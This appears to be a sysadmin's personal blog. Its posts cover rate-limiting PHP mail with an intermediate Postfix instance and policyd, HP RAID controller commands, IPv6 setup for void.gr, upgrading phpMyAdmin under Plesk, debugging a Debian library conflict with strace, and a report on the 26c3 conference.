Rate limit outgoing emails from PHP web applications using postfix and policyd

One of the worst things a webmaster or a anyone else that runs some web application can do, is to constantly send “informative newsletters” to people. Most CMS applications make it really easy to send such emails. These are 99% spam, and as such there are many good reasons that you should limit the amount of such outgoing “newsletters” coming out of your email server. Else there’s a good chance you might get added to a blacklist, and you don’t want your legitimate clients to have their emails blocked because of some irresponsible people. I recently had to deploy such a solution to a hosting server that serves multiple (>300) domains. The server already ran postfix, so I had to implement something useful around it.

The problem with postfix is that you can’t really rate-limit the outgoing queue per sender domain/address. There are only generic settings that control the general mail server’s capabilities of sending emails. What I wanted though is to have the ability to restrict specific domains to some specific email message count per day. This is something that a postfix addon named postfix-policyd can do by deferring/greylisting, but still just on the incoming queue. One would think that the problems would be solved by just applying this, but truth is that they don’t. Applying a defer/greylisting policy on the incoming queue is fine while the client on the remote side is another SMTP server that can happily store the deferred email on its queue and retry some minutes/hours later. What happens though if the SMTP client is a PHP application that connects through the mail() function ? There you have no queue and if you defer a message at the SMTP server it will get forever lost, PHP can’t resend it. So the solution would be to apply an intermediate SMTP queue between PHP and the primary SMTP server, that is another local postfix installation that would only serve as a queue that relays emails to the primary.

Using a “simple” diagram sending an email from PHP should follow this path upon a successful installation:

PHP mail() –(sendmail binary)–> intermediate_POSTFIX –(SMTP relay)–> POSTFIX –(smtpd_sender_restrictions)–> POLICYD –(pickup)–> POSTFIX –(SMTP)–> REMOTE SERVER

Here are the steps I took on a Debian Squeeze server to install this little monster.

1. Create a new postfix configuration directory for the new intermediate postfix instance
I named my intermediate postfix config dir as postfix2525, name comes from the port that it will listen on but you can definitely be more creative.

# mkdir /etc/postfix2525
# cp -av /etc/postfix /etc/postfix2525

Remove everything from /etc/postfix2525/main.cf and just add the following lines:

data_directory = /var/lib/postfix2525
queue_directory = /var/spool/postfix2525
relayhost = 127.0.0.1:12525

This defines a new data and queue directory and instructs this postfix to relay all emails through another one that listens on the localhost, the primary one, on port 12525. More about this port later when you will create some special config on the primary postfix.

Remove previous contents of /etc/postfix2525/master.cf and just add these lines:

127.0.0.1:2525      inet  n       -       -       -       2       smtpd
        -o syslog_name=postfix2525
pickup    fifo  n       -       -       60      1       pickup
cleanup   unix  n       -       -       -       0       cleanup
qmgr      fifo  n       -       n       300     1       qmgr
#qmgr     fifo  n       -       -       300     1       oqmgr
tlsmgr    unix  -       -       -       1000?   1       tlsmgr
rewrite   unix  -       -       -       -       -       trivial-rewrite
bounce    unix  -       -       -       -       0       bounce
defer     unix  -       -       -       -       0       bounce
trace     unix  -       -       -       -       0       bounce
verify    unix  -       -       -       -       1       verify
flush     unix  n       -       -       1000?   0       flush
proxymap  unix  -       -       n       -       -       proxymap
proxywrite unix -       -       n       -       1       proxymap
smtp      unix  -       -       -       -       -       smtp
# When relaying mail as backup MX, disable fallback_relay to avoid MX loops
relay     unix  -       -       -       -       -       smtp
        -o smtp_fallback_relay=
#       -o smtp_helo_timeout=5 -o smtp_connect_timeout=5
showq     unix  n       -       -       -       -       showq
error     unix  -       -       -       -       -       error
retry     unix  -       -       -       -       -       error
discard   unix  -       -       -       -       -       discard
local     unix  -       n       n       -       -       local
virtual   unix  -       n       n       -       -       virtual
lmtp      unix  -       -       -       -       -       lmtp
anvil     unix  -       -       -       -       1       anvil
scache    unix  -       -       -       -       1       scache

Obviously the most important part here is the first line. It defines that this postfix instance will listen for SMTP connections on localhost, port 2525 and it’s syslog output name will be postfix2525 so that it’s easier to tell apart which SMTP instance spits which errors.

After this is done you need to run the following command that will create all necessary directories with their proper permissions.

# postfix -c /etc/postfix2525/ check

Also make sure you add the following line to the main.cf file of your main postfix installation:
alternate_config_directories = /etc/postfix2525

You will also need a new init script. Since the script by itself is quite big and there are only a few lines that actually differ, I will post my diff here:

--- /etc/init.d/postfix  2011-05-04 21:17:47.000000000 +0200
+++ /etc/init.d/postfix2525  2011-12-19 19:22:09.000000000 +0100
@@ -17,8 +17,10 @@
 # Description:       postfix is a Mail Transport agent
 ### END INIT INFO
 
+CONFDIR=/etc/postfix2525
 PATH=/bin:/usr/bin:/sbin:/usr/sbin
 DAEMON=/usr/sbin/postfix
+DAEMON_OPTIONS="-c /etc/postfix2525"
 NAME=Postfix
 TZ=
 unset TZ
@@ -28,13 +30,13 @@
 
 test -f /etc/default/postfix && . /etc/default/postfix
 
-test -x $DAEMON && test -f /etc/postfix/main.cf || exit 0
+test -x $DAEMON && test -f /etc/postfix2525/main.cf || exit 0
 
 . /lib/lsb/init-functions
 #DISTRO=$(lsb_release -is 2>/dev/null || echo Debian)
 
 running() {
-    queue=$(postconf -h queue_directory 2>/dev/null || echo /var/spool/postfix)
+    queue=$(postconf -c $CONFDIR -h queue_directory 2>/dev/null || echo /var/spool/postfix2525)
     if [ -f ${queue}/pid/master.pid ]; then
   pid=$(sed 's/ //g' ${queue}/pid/master.pid)
   # what directory does the executable live in.  stupid prelink systems.
@@ -66,7 +68,7 @@
       fi
 
       # see if anything is running chrooted.
-      NEED_CHROOT=$(awk '/^[0-9a-z]/ && ($5 ~ "[-yY]") { print "y"; exit}' /etc/postfix/master.cf)
+      NEED_CHROOT=$(awk '/^[0-9a-z]/ && ($5 ~ "[-yY]") { print "y"; exit}' /etc/postfix2525/master.cf)
 
       if [ -n "$NEED_CHROOT" ] && [ -n "$SYNC_CHROOT" ]; then
     # Make sure that the chroot environment is set up correctly.
@@ -111,7 +113,7 @@
     umask $oldumask
       fi
 
-      if start-stop-daemon --start --exec ${DAEMON} -- quiet-quick-start; then
+      if start-stop-daemon --start --exec ${DAEMON} -- ${DAEMON_OPTIONS} quiet-quick-start; then
     log_end_msg 0
       else
     log_end_msg 1
@@ -123,7 +125,7 @@
   RUNNING=$(running)
   log_daemon_msg "Stopping Postfix Mail Transport Agent" postfix
   if [ -n "$RUNNING" ]; then
-      if ${DAEMON} quiet-stop; then
+      if ${DAEMON} ${DAEMON_OPTIONS} quiet-stop; then
     log_end_msg 0
       else
     log_end_msg 1

If everything went well up to now you should be able to start your new postfix instance and check that it is actually running.

# /etc/init.d/postfix2525 start
# netstat -antp | grep 2525
tcp        0      0 127.0.0.1:2525          0.0.0.0:*               LISTEN      6138/master

2. Configure main postfix to accept emails from the intermediate
Edit /etc/postfix/master.cf and add this line at the bottom:

127.0.0.1:12525 inet n - - - - smtpd  -o smtp_fallback_relay= -o smtpd_client_restrictions=  -o smtpd_helo_restrictions=  -o smtpd_recipient_restrictions=permit_mynetworks,reject  -o smtpd_data_restrictions=  -o receive_override_options=no_unknown_recipient_checks

This defines a special port for the main postfix instance that has (or maybe it hasn’t actually) some special restrictions.
Actually you will have to change this line later on upon installing postfix-policyd, but this should be good enough for now, in order for you to do some testing.
Restart postfix

# /etc/init.d/postfix restart
# netstat -antp | grep 2525
tcp        0      0 127.0.0.1:12525         0.0.0.0:*               LISTEN      26799/master    
tcp        0      0 127.0.0.1:2525          0.0.0.0:*               LISTEN      6138/master   

The intermediate postfix listens on 127.0.0.1:2525 and the main one has another special listening port on 127.0.0.1:12525.

3. Test your intermediate postfix instance
You can do this in a gazillion different ways. One of my favorite ways to test SMTP connectivity is through telnet (—> shows data entry):

# telnet localhost 2525
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 server.mydomain.gr ESMTP Postfix
---> EHLO koko.gr
250-server.mydomain.gr
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
---> MAIL FROM: lala@koko.gr
250 2.1.0 Ok
---> RCPT TO: koko@destination.gr
250 2.1.5 Ok
---> DATA
354 End data with <CR><LF>.<CR><LF>
---> THIS IS A TEST
---> .
250 2.0.0 Ok: queued as C41E21C84FF
---> quit

If you were keeping an eye on syslog messages you should have seen some connection messages both from postfix2525 and from postfix. If everything went well your email _should_ have arrived at it’s destination. If this is true then your primary postfix instance now works as a relay for your intermediate queue.

Don’t read the next parts of this post if you haven’t previously managed this step!

4. Install and configure postfix-policyd

# aptitude install postfix-policyd

To run policyd you need to create a database and import policyd SQL schema to it. Your distro has probably already taken care of the previous step, if it hasn’t…do it manually and think about changing distro!
Then edit the config file usually located at /etc/postfix-policyd.conf. The options I chose to play with were the following:
SENDERTHROTTLE=1
SENDER_THROTTLE_SASL=1
SENDER_THROTTLE_HOST=0

Since all emails will be relayed through localhost there’s no point in throttling per host, what is needed is throttling per envelope sender.
You should manually review your desired limits though. I won’t post mine here because everyone has different needs and there’s no sane config for everyone.

Start postfix-policyd
# /etc/init.d/postfix-policyd start

If you get weird startup errors like:
postfix-policyd: fatal: didn't find priority 'LOG_IFOO', exiting
Edit /etc/postfix-policyd.conf, find the following line:
SYSLOG_FACILITY="LOG_MAIL | LOG_INFO"
and change it to (mind the removed spaces):
SYSLOG_FACILITY="LOG_MAIL|LOG_INFO"

5. Configure main postfix instance to use postifix-policyd
Edit /etc/postfix/main.cf and add this:
webclient_restrictions = check_policy_service inet:127.0.0.1:10031

Then edit /etc/postfix/master.cf again and change the line you had previously added to the bottom of the file with this:

127.0.0.1:12525 inet n - - - - smtpd  -o smtp_fallback_relay= -o smtpd_client_restrictions=  -o smtpd_helo_restrictions=  -o smtpd_recipient_restrictions=permit_mynetworks,reject  -o smtpd_data_restrictions=  -o receive_override_options=no_unknown_recipient_checks -o smtpd_sender_restrictions=${webclient_restrictions}

The difference is
-o smtpd_sender_restrictions=${webclient_restrictions}
which practically instructs postfix to use postfix-policyd for emails that arrive on port 12525, which is the port that the intermediate postfix instance uses to relay all emails.

6. Test your intermediate postfix instance again
If everything went well, the main postfix instance should now be able to enforce sender policies. Try sending a new email through the intermediate postfix again, yes using telnet, and you should pickup some new log lines at your syslog:

Dec 19 21:56:40 myserver postfix-policyd: connection from: 127.0.0.1 port: 45635 slots: 0 of 4096 used
Dec 19 21:56:40 myserver postfix-policyd: rcpt=5, greylist=new, host=127.0.0.1 (unknown), from=lala@koko.gr, to=koko@lalala.gr, size=348
Dec 19 21:56:40 myserver postfix/smtpd[9168]: NOQUEUE: reject: RCPT from unknown[127.0.0.1]: 450 4.7.1 : Sender address rejected: Policy Rejection- Please try later.; from= to= proto=ESMTP helo=
Dec 19 21:56:40 myserver postfix/smtp[8970]: C41E21C84FF: to=, relay=127.0.0.1[127.0.0.1]:12525, delay=20, delays=20/0/0.01/0, dsn=4.7.1, status=deferred (host 127.0.0.1[127.0.0.1] said: 450 4.7.1 : Sender address rejected: Policy Rejection- Please try later. (in reply to RCPT TO command))

The above means that greylisting through policyd works.

7. make PHP use your new intermediate postfix instance
PHP on linux by default uses the sendmail binary to send emails via the mail() function. That would use the main postfix instance though, so one needs to edit /etc/php/apache2/php.ini and change the following line:
sendmail_path = "sendmail -C /etc/postfix2525 -t -i"

The -C directive instructs sendmail to use the alternate config dir, so that emails will be sent to the new intermediate postfix instance and then to the main one, passing through policyd of course.

To check the queue size of the intermediate postfix:
# postqueue -p -c /etc/postfix2525/

If any PHP applications that are hosted have explicit SMTP server/port directives, then be sure to notify your clients/developers that they _MUST_ use localhost:2525 to send their emails to and not the default localhost:25. This is one of the shortcomings of the above method, if someone manually sets up his application to use the default localhost:25 his emails will get right through. But being a good sysadmin, you should monitor such behavior and punish those users accordingly!

That’s about it…with the above configuration and some tweaking to the thresholds you have very good chances of avoiding getting blacklisted because someone decided to send a few thousand spams emails. And most importantly, your normal mail service will continue to work flawlessly, no matter how big the queue of the intermediate mail server is.

Enjoy!

Reference for policyd: http://policyd.sourceforge.net/readme.html

Handling right clicks on a macbook running Linux – The 2011 Awesome Edition

2 years ago I had written a post about handling right clicks on a macbook running linux. Along with changing my window manager of choice, I think I’ve found a better/more elegant solution to that problem.

On my computer’s workspaces one will normally find one or two browser windows open, some instant messaging applications (skype,pidgin), an mp3 player (audacious2) and terminals. Lots of them. I need them to ssh to the servers I monitor/administer and for coding (with vim of course!). I even use one for my email client (mutt). So I need my terminals to be as efficient as possible. After many trials over the years I’ve decided on using urxvt as my terminal of choice.

About a month ago I gave awesome a try and since then it’s been my window manager of choice instead of fluxbox. The reason behind this is mostly fluxbox’s inability to tile terminal (call me urxvt) windows efficiently while changing resolutions. I mostly use my laptop with an external 23” monitor but I wanted to be able to tile my terminals independently of using only my laptop’s screen or both laptop’s and the external one. In fluxbox you can make a window appear on specific area of the screen, so I could open 3-4 terminals on a specific workspace/monitor. Resizing though one of them to fit some monitoring program more efficiently didn’t resize the others ‘automagically’ as well. So, I had to manually resize all open windows of that workspace. Yes, this is horrible from a usability point of view, luckily I didn’t have to do it that frequently. So, I gave awesome a try for its tiling features. I really miss though fluxbox’s tabbing features that I constantly used along with it’s amazing keybindings flexibility (Rant: isn’t it stupid that you have to write your keybindings in lua for awesome and in haskell for xmonad ?) but the tiling capabilities of awesome are currently more important to me.

So while my previous solution for right clicking without a mouse worked pretty well for fluxbox, in my new awesome world I’ve replaced it with xautomation tools. First of all, one needs to install xautomation tools

aptitude install xautomation

Then find clientbuttons configuration part in the default ~/.config/awesome/rc.lua and add this line to it:

awful.button({ modkey }, 2, function () awful.util.spawn("xte 'mouseclick 3'") end)

restart awesome and try modkey + 3 finger tap on your touchpad. You should be seeing a right click “menu”.
If you don’t know what 3 finger tap is or how to configure it, read the 2009 article.

That’s it, no more xbindkeys + xvkbd for awesome.

Notes on HP raid controllers

Lately I had to deal with some HP raid controllers and I’ve gathered some notes on them. I’ll post them here so I won’t forget about them.

First of all, don’t even think on using them without a battery pack. Seriously DON’T. The performance degradation is humongous. Without a battery pack the controllers were giving me 1/20th of the results with a battery pack. If you want to quickly test them, try iozone using the following options: iozone -t4 -I

Installing hpacucli is a also a must if you want to monitor or configure the controllers from within your OS. Be sure to add the repositories from HWraid to your system and then issue: aptitude install hpacucli (you are using Debian, arent’ you?). That reminds me that I am using those repositories on so many systems I manage that I must send a donation to the people at hwraid to thank them.

Below are some commands using hpacucli that I used.
# Show everything about your raid controllers
# hpacucli controller all show config detail

Cache Board Present: True
Cache Status: OK
Accelerator Ratio: 25% Read / 75% Write
Drive Write Cache: Enabled
Total Cache Size: 512 MB
Battery Pack Count: 1
Battery Status: OK
SATA NCQ Supported: True

What you must take notice here is the Accelerator Ratio, Drive Write Cache and Battery Pack Count.
if you have a battery pack installed but your Drive Write Cache is still shown as “Disabled”, you can enable it using the command:
# hpacucli controller slot=X modify dwc=enable
You’ll know what to put instead of “slot=X” from the output of the previous command (show config detail).

To modify Accelerator Ratio (read/write):
# hpacucli controller slot=X modify cacheratio=25/75

To enable Array Acceleration for one of your logical drives use:
# hpacucli controller slot=X logicaldrive Y modify aa=enable

If you happen to face the following error while opening hpacucli, don’t worry. You don’t need to reboot your machine as I’ve seen in various blogs.

Error: Another instance of ACU is already running (possibly a service). Please
terminate the ACU application before running the ACU CLI. Press ENTER to
exit.

What you need to do is delete the shared IPC that hpacucli left when it got killed for some reason.
To see all your ipcs:

# ipcs
------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status      

------ Semaphore Arrays --------
key        semid      owner      perms      nsems     
0xffffffff 32768      root       0          1         

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages    

Then use ipcrm to remove the array with the semid you want:
# ipcrm -s 32768

and try to start hpacucli again.

References:
1. http://www.datadisk.co.uk/html_docs/redhat/hpacucli.htm
2. http://people.freebsd.org/~jcagle/hpacucli-readme

void.gr on native IPv6

Some months ago (exactly 4 actually) I had posted that void.gr was then accessible over IPv6. Today void.gr is accessible over native IPv6 thanks to my hosting provider, Leaseweb.

About a year ago I had asked Leaseweb for IPv6 support and their reply wasn’t very promising. It seemed that they weren’t really looking forward to providing IPv6 for their dedicated server clients yet. Today though I thought I should ask again, even if IPv6 support for their dedicated servers is still not referenced anywhere. And I got lucky! They offered me a /64.

So void.gr is from now accessible over IPv6 at 2001:1af8:4100:a000:4::131.

Accessing my server over IPv6 from my home’s native IPv6 connection, thanks to OTE providing beta IPv6 access to subscribers, seems a bit faster than accessing it via IPv4. Ping times are usually 4-5ms better. Looks like IPv6 connections are not that crowded as IPv4 are 🙂

The setup is pretty straightforward. Even if Debian Wiki is not very clear about how to setup IPv6, here’s what you have to do if you, like me, have a server with a native IPv6 connection.

# vi /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 85.17.162.131
    netmask 255.255.255.0
    gateway 85.17.162.254
    network 85.17.162.0
    broadcast 85.17.162.255
iface eth0 inet6 static
    address 2001:1af8:4100:a000:4::131
    netmask 64
    gateway 2001:1AF8:4100:A000::1

Then of course you need to edit your Apache configuration to add the IPv6 vhosts.

P.S. I am still waiting an answer as to whether I can manage the reverse delegation of the IPv6 address space Leasweb gave me since I can’t do that from the control panel. I’ll post any updates on the ticket when I have some news…

Upgrading Plesk’s phpMyAdmin to the latest version

phpMyAdmin is a great tool but a constant headache (xss, sql injections,etc) as well. Every now and then there are new security holes discovered that need to be fixed ASAP. On the other hand, Plesk doesn’t seem to follow these security fixes, so if you want to keep yourself a bit more secure than Plesk thinks you should be, then you have to upgrade phpMyAdmin by your self. This procedure isn’t very straightforward due to the way Plesk uses PMA so I’ll post here some notes/guidelines on how to achieve that.

My notes are based on Plesk 8.6, so I am sure newer Plesk versions are way easier to upgrade than this.

Step 1: Download new phpMyAdmin
# wget http://downloads.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.3.8/phpMyAdmin-3.3.8-all-languages.tar.gz
Step 2: Extract into /opt/psa/admin/htdocs/domains/databases/

# mv phpMyAdmin-3.3.8-all-languages.tar.gz /opt/psa/admin/htdocs/domains/databases/
# cd /opt/psa/admin/htdocs/domains/databases/
# tar zxf phpMyAdmin-3.3.8-all-languages.tar.gz

Step 3: Rename old PMA and symlink the new
# mv phpMyAdmin phpMyAdmin.old
# ln -sf phpMyAdmin-3.3.8-all-languages phpMyAdmin

Step 4: Copy old config file
This step depends on your old PMA version. Since my version was 2.8.2.4 I had to:
#cp phpMyAdmin.old/libraries/config.default.php phpMyAdmin/config.inc.php
If you have newer versions of PMA just do:
#cp phpMyAdmin.old/config.inc.php phpMyAdmin/config.inc.php
Step 5: Edit necessary files
Substep a: edit phpMyAdmin/libraries/session.inc.php
When the first comment block finishes and before line 14: if (! defined('PHPMYADMIN')) {
add the following snippet:
// Close Plesk's session.
$proxy_session_id = session_id();
@session_write_close();
unset($_SESSION);

Substep b: edit phpMyAdmin/libraries/common.inc.php around line 190 and change:
    'error_handler',
    'PMA_PHP_SELF',
    'variables_whitelist',
    'key'
);

to
'error_handler',
    'PMA_PHP_SELF',
    'variables_whitelist',
    'key',
    // from Plesk
    'PHP_SELF',
    'db_host',
    'db_port',
    'db_user',
    'db_pass',
    'db_name'
);

!! Mind the “,” after ‘key’ !!

That’s about it…you should now be able to use your new PMA version through Plesk.

void.gr on IPv6

Since Leaseweb, the hosting company where void.gr’s server is located, isn’t yet ready to provide native IPv6 to dedicated servers, I decided not to wait for them any longer and to set up an IPv6 tunnel to tunnelbroker.net so that I make void.gr accessible over IPv6.

Setting up the tunnel is extremely easy. Having the following in my /etc/rc.conf does the trick:

ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local 85.17.162.131 ttl 255
ip link set he-ipv6 up
ip addr add 2001:470:1f14:e0a::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6
ip addr add 2001:470:1f15:e0a::1/64 dev eth2

Yes, I know I could have used some of debian’s config files for these parameters…Oh and you “ifconfig” users, time to give up using that ancient tool, it’s time you learn how to use “ip”.

So for you people who have IPv6 connectivity, just try it. The current IP of void.gr is 2001:470:1f15:e0a::1. Ping6 it 🙂

Time is ticking away…bye bye IPv4: http://ipv6.he.net/statistics/

Investigating SIGABRT problems on Debian

3 days ago, after a Debian(squeeze/sid) upgrade on my laptop some programs started not to open. Specifically, pidgin and google-chrome were crashing while trying to open them. When I started them from a terminal the output was this:

kargig@laptop:~%pidgin
[1]    3853 abort      pidgin
kargig@laptop:~%google-chrome
[1]    3882 abort      google-chrome

The first thing I checked was the updated packages, whether there was some culprit.
The upgraded packages included among others:

[UPGRADE] libk5crypto3 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libkrb5-3 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libkrb5support0 1.8.3+dfsg-1 -> 1.8.3+dfsg-2
[UPGRADE] libnspr4-0d 4.8.4-2 -> 4.8.6-1
[UPGRADE] libnss3-1d 3.12.6-3 -> 3.12.8-1
[UPGRADE] linux-base 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-headers-2.6.32-5-686-bigmem 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-headers-2.6.32-5-common 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-image-2.6.32-5-686-bigmem 2.6.32-23 -> 2.6.32-25
[UPGRADE] linux-libc-dev 2.6.32-23 -> 2.6.32-25
[UPGRADE] xserver-xorg-video-intel 2:2.9.1-4 -> 2:2.12.0+shadow-2

My first point of checking was the xserver-xorg-video package. I started searching the Debian bug tracking system for references of crashes with abort. Nothing. Then I tried to check the other “suspicious” packages with abort crash reports on the bug tracker…still nothing.
It was time for strace.

kargig@laptop:~%strace pidgin
...
[snip]
...
open("/usr/lib/nss/libfreebl3.so", O_RDONLY) = 14
read(14, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\30\0\0004\0\0\0"..., 512) = 512
fstat64(14, {st_mode=S_IFREG|0644, st_size=253328, ...}) = 0
mmap2(NULL, 268988, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 14, 0) = 0xb58e3000
mmap2(0xb5920000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 14, 0x3d) = 0xb5920000
mmap2(0xb5921000, 15036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb5921000
close(14)                               = 0
open("/etc/ld.so.cache", O_RDONLY)      = 14
fstat64(14, {st_mode=S_IFREG|0644, st_size=79200, ...}) = 0
mmap2(NULL, 79200, PROT_READ, MAP_PRIVATE, 14, 0) = 0xb5ab7000
close(14)                               = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/swiftfox/libnspr4.so", O_RDONLY) = 14
read(14, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\227\0\0004\0\0\0"..., 512) = 512
fstat64(14, {st_mode=S_IFREG|0755, st_size=251136, ...}) = 0
close(14)                               = 0
munmap(0xb5ab7000, 79200)               = 0
rt_sigprocmask(SIG_UNBLOCK, [ABRT], NULL, 8) = 0
tgkill(4027, 4027, SIGABRT)             = 0
--- SIGABRT (Aborted) @ 0 (0) ---
+++ killed by SIGABRT +++
[1]    4026 abort      strace pidgin

What immediately caught my eye was this line inside the output:
open("/usr/lib/swiftfox/libnspr4.so", O_RDONLY) = 14
I have a 3rd party package called swiftfox installed, but why was pidgin trying to use this package’s library instead of the system one ?

# ldconfig -p | grep nspr4
ldconfig -p | grep nspr4
  libnspr4.so.0d (libc6) => /usr/lib/libnspr4.so.0d
  libnspr4.so (libc6) => /usr/lib/swiftfox/libnspr4.so
  libnspr4.so (libc6) => /usr/lib/libnspr4.so

So the system package libnspr4-0d has installed its files in /usr/lib/libnspr4.so.0d and has also placed a symlink from /usr/lib/libnspr4.so to /usr/lib/libnspr4.so.0d. For some reason though the /usr/lib/swiftfox/libnspr4.so appears before /usr/lib/libnspr4.so in the cache output for the libnspr4.so library.
Checking out /etc/ld.so.conf.d/ directory, there was a moz.conf file containing the path “/usr/lib/swiftfox/“.
An “ldconfig -v” confirmed the finding:

/usr/local/lib:
/usr/lib/swiftfox:
        libnssckbi.so -> libnssckbi.so
        libssl3.so -> libssl3.so
        libsqlite3.so -> libsqlite3.so
        libnssutil3.so -> libnssutil3.so
        libnss3.so -> libnss3.so
        libnspr4.so -> libnspr4.so
        libsmime3.so -> libsmime3.so
        libmozjs.so -> libmozjs.so
        libsoftokn3.so -> libsoftokn3.so
        libplc4.so -> libplc4.so
        libxul.so -> libxul.so
        libplds4.so -> libplds4.so
        libxpcom.so -> libxpcom.so
        libnssdbm3.so -> libnssdbm3.so
        libfreebl3.so -> libfreebl3.so
/lib:
        libnss_compat.so.2 -> libnss_compat-2.11.2.so
        libselinux.so.1 -> libselinux.so.1
...
[snip]
...

Moving /usr/lib/swiftfox/libnspr4.so to some other location allowed applications like pidgin and google-chrome to start normally (and swiftfox still runs properly).

I guess that was my punishment for using 3rd party packages on Debian…

*UPDATE 23/11/2010*
Google chrome was crashing with some https:// sites with SIGABRT. After further investigation I had to delete /usr/lib/swiftfox/libnssutil3.so as well.

Debian adventures

This is post is a rant. So don’t complain, I warned you.

<rant>
On my laptop (Macbook 4,1) I run Debian testing/experimental which was running quite smoothly since I installed it apart from the couple few weeks.

The first problem I faced was java not running inside browsers. Firefox, Iceweasel, Opera, google-chrome…nothing. I spent at least 2 hours installing/uninstalling various java packages, moving plugins to new locations and I couldn’t get it to work. I was furiously googling about the issue until I hit the jackpot: squeeze : in case you have no network connection with java apps …

Today I upgraded xserver-xorg-input-synaptics from 1.2.0-2 to 1.2.1-1. Even though it is a minor version bump a kind fairy also told me to reboot…I rebooted and my touchpad was not working properly, tapping was lost, I couldn’t use synclient because shared memory config (SHM) was not activated and so on and so on. My dynamic config using hal was there, /var/log/Xorg.0.log said that I was using the proper device and lshal showed correct settings for the device. I read /usr/share/doc/xserver-xorg-input-synaptics/NEWS.Debian.gz nothing new. After some googling another jackpot: Bug#564211: xserver-xorg-input-synaptics: Lost tapping after upgrading to 1.2.1-1. For some reason touchpad config has moved to udev from hal and the maintainers didn’t think it was important enough that needed to be documented someplace or put it in README.Debian…

The last issue I am having is with linux-image-2.6.32-trunk-686-bigmem not working correctly with KMS and failing with DRM.
[ 0.967942] [drm] set up 15M of stolen space
[ 0.968030] nommu_map_sg: overflow 13d800000+4096 of device mask ffffffff
[ 0.968085] [drm:drm_agp_bind_pages] *ERROR* Failed to bind AGP memory: -12
[ 0.968159] [drm:i915_driver_load] *ERROR* failed to init modeset
[ 0.973067] i915: probe of 0000:00:02.0 failed with error -28

linux-image-2.6.32-trunk-686 works fine with those though.
[ 0.973466] [drm] set up 15M of stolen space
[ 1.907642] [drm] TV-16: set mode NTSC 480i 0
[ 2.137173] [drm] LVDS-8: set mode 1280x800 1f
[ 2.193497] Console: switching to colour frame buffer device 160x50
[ 2.197435] fb0: inteldrmfb frame buffer device
[ 2.197436] registered panic notifier
[ 2.197442] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0

Xorg is amazingly sluggish using linux-image-2.6.32-trunk-686-bigmem kernel. I search the debian bugs database and noone seems to have reported such an issue. But google came up with: [G35/KMS] DRM failure during boot (linux 2.6.31->2.6.32 regression). The issue looks solved so I will try and report it to Debian and see what comes out of it…
*Update* Bug Report: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=567352

If you dare to comment saying “that’s what you get for using experimental” I really hope and curse you to spend 3 hours today to try and figure out what has changed in a minor version upgrade of one of your installed packages.
Even worse, if you are on those guys that kept telling me “don’t use stable, testing is stable as a rock, never had a problem in years…” then I curse you to spend a whole day trying to reconfigure something with no documentation 😛
<rant></rant>

26c3: Here Be Dragons!

We have been talking with Patroklos (argp of census-labs.com) about going to a CCC event for years. This year though we were determined. So on late September 2009 we booked our flight tickets to Berlin. A couple of weeks later some other friends expressed their wish to come with us. So in the end me, Patroklos, huku and SolidSNK (of grhack.net) and Christine formed up a group to visit 26c3 Here Be Dragons. Another group of Greeks also came to 26c3, among them Ithilgore, xorl, sin , gorlist and one more that I have no idea who he was, sorry 🙂

After a canceled flight on the 26th of December due to fog on SKG airport we finally flew on the 27th and went to Berlin. After arriving there we immediately went to the hotel we had booked and then straight to the Berliner Congress Center where the 26c3 was taking place.

BCC is an excellent conference center, nothing close to anything I have ever seen in Greece. It looks great both from the outside and from the inside. When we entered BCC we saw a huge number of diverse people. You could see and feel the difference with all the other IT conferences. People were very relaxed, very talkative and extremely friendly. What makes CCC so special is it’s community. There were soooo many CCC volunteers inside the BCC willing to help you with any information you might need. More on that later on…

After paying just 80€ for the whole conference, 4 days, we started walking around the ground floor. There were many information desks of various projects, free PCs to use (loaded with Ubuntu), the huge lounge which included a bar for food and drinks with lots of seats for people and 2 rooms for presentations. On the upper floor there were many more projects and another large room for presentations.

What made BCC so lively were all these projects around the presentation rooms. There were always hundreds of people sitting outside of the presentation rooms hacking on their projects, discussing with other people, selling merchandise, etc. Because it was our first time in the conference we were not experienced enough to use our time wisely between the lectures so I only managed to visit very few projects, Cacert, Gentoo and Debian. I am sure that there were people who did not attend any lectures at all and just sat all day at their projects’ infodesk.

Before I continue with the presentations we went to I want to make a note about volunteers again. Volunteers at 26c3 were called angels and they did an EXCELLENT job. They would not allow you to sit wherever you liked at a lecture, they would try to find you a seat or they would put you on a place where you could stand without blocking others. Nobody was allowed to sit at the corridors, nobody. Everything was in order and I never ever heard a single person complain about angels’ policy. They were strict and firm on one hand but helpful, fair and polite on the other. They were probably the best volunteers I have ever faced anywhere. All of them were carrying an ID and a DECT phone on them to cooperate with other angels (oh yes, the conference had it’s own DECT network…AND it’s own GSM network!!!) Funny quote: Angels at the entrance and exit doors wore t-shirts that wrote “Physical ACL”, heh.

